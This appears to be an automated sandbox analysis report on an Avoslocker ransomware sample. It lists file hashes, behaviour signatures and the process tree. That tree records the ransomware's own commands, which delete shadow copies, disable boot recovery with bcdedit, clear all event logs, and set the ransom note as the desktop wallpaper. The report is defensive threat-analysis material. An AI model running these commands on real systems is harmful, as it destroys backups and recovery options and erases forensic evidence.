Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    30-05-2024 03:38

General

  • Target

    fd0c1a35cc4ac399e015dab9a976dc3ed835d64cd96e1730f110249a74fd67bb.exe

  • Size

    1002KB

  • MD5

    29a6c44066af8bc35809cd1f8976b4d1

  • SHA1

    b963ab9dadb49efe06b1ddddc1bee6e617d8f3e2

  • SHA256

    fd0c1a35cc4ac399e015dab9a976dc3ed835d64cd96e1730f110249a74fd67bb

  • SHA512

    33e8027a78612ffe88e99b5281f4c2506727c1829dca4f7168d3dd915adf9e4985ded41f4f68cbc05f599d82e1ff44d0a2ba917bb0ed3873acd047bb96dc9627

  • SSDEEP

    24576:UgoMwIykL7QZON73jGEItU5D7aaBWiP/3VUl:wMTfQUFTTItU5DeWP/3VUl

Malware Config

Signatures

  • Avoslocker Ransomware

    Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (10433) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\fd0c1a35cc4ac399e015dab9a976dc3ed835d64cd96e1730f110249a74fd67bb.exe
    "C:\Users\Admin\AppData\Local\Temp\fd0c1a35cc4ac399e015dab9a976dc3ed835d64cd96e1730f110249a74fd67bb.exe"
    1⤵
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2908
    • C:\Windows\system32\cmd.exe
      cmd /c wmic shadowcopy delete /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2536
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1992
    • C:\Windows\system32\cmd.exe
      cmd /c vssadmin.exe Delete Shadows /All /Quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2540
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1428
    • C:\Windows\system32\cmd.exe
      cmd /c bcdedit /set {default} recoveryenabled No
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2580
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled No
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1208
    • C:\Windows\system32\cmd.exe
      cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1924
    • C:\Windows\system32\cmd.exe
      cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2600
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$a = [System.IO.File]::ReadAllText(\"F:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4572
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1596118546.png /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:5152
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
        3⤵
          PID:896
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
        PID:6120

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L0DEU2HOR54G1IXRMBJ7.temp

        Filesize

        7KB

        MD5

        478c6987d0a47723aba184402fd19ba5

        SHA1

        c2d6efa45da8392da8bb4d770d4a6b638b32ea19

        SHA256

        818037500ed15d5da9b9777d203c89ecababad480ed5ef374e7325b3faff5fe7

        SHA512

        11456882ac4f1a8334b25684ffaffdb04e34e157451dc08e578e2908f6b91c54ac540f96f675b2cea15b362d594ba096e646a11d1113c6ad3de948427d6837aa

      • F:\GET_YOUR_FILES_BACK.txt

        Filesize

        1011B

        MD5

        6d81ed40ba0a283e5483bfe6a448e9d7

        SHA1

        0c847a5f9df743b13e1aa11b4c24a4309e9a7119

        SHA256

        b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d

        SHA512

        8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

      • memory/952-1238-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

        Filesize

        32KB

      • memory/952-1152-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

        Filesize

        2.9MB

      • memory/2908-7-0x0000000000400000-0x00000000004E5000-memory.dmp

        Filesize

        916KB

      • memory/2908-9-0x0000000000400000-0x00000000004E5000-memory.dmp

        Filesize

        916KB

      • memory/2908-6-0x0000000000290000-0x0000000000291000-memory.dmp

        Filesize

        4KB

      • memory/2908-3-0x0000000000400000-0x00000000004E5000-memory.dmp

        Filesize

        916KB

      • memory/2908-2-0x0000000000240000-0x0000000000283000-memory.dmp

        Filesize

        268KB

      • memory/2908-1-0x0000000000400000-0x00000000004E5000-memory.dmp

        Filesize

        916KB

      • memory/2908-8-0x0000000000400000-0x00000000004E5000-memory.dmp

        Filesize

        916KB

      • memory/2908-0-0x0000000000400000-0x00000000004E5000-memory.dmp

        Filesize

        916KB

      • memory/2908-5-0x0000000000401000-0x000000000049D000-memory.dmp

        Filesize

        624KB

      • memory/2908-15328-0x0000000000400000-0x00000000004E5000-memory.dmp

        Filesize

        916KB

      • memory/2908-4-0x0000000000400000-0x00000000004E5000-memory.dmp

        Filesize

        916KB

      • memory/2908-24597-0x0000000000401000-0x000000000049D000-memory.dmp

        Filesize

        624KB

      • memory/2908-24596-0x0000000000240000-0x0000000000283000-memory.dmp

        Filesize

        268KB

      • memory/2908-24595-0x0000000000400000-0x00000000004E5000-memory.dmp

        Filesize

        916KB

      • memory/4572-24603-0x000000001B570000-0x000000001B852000-memory.dmp

        Filesize

        2.9MB

      • memory/4572-24604-0x00000000022D0000-0x00000000022D8000-memory.dmp

        Filesize

        32KB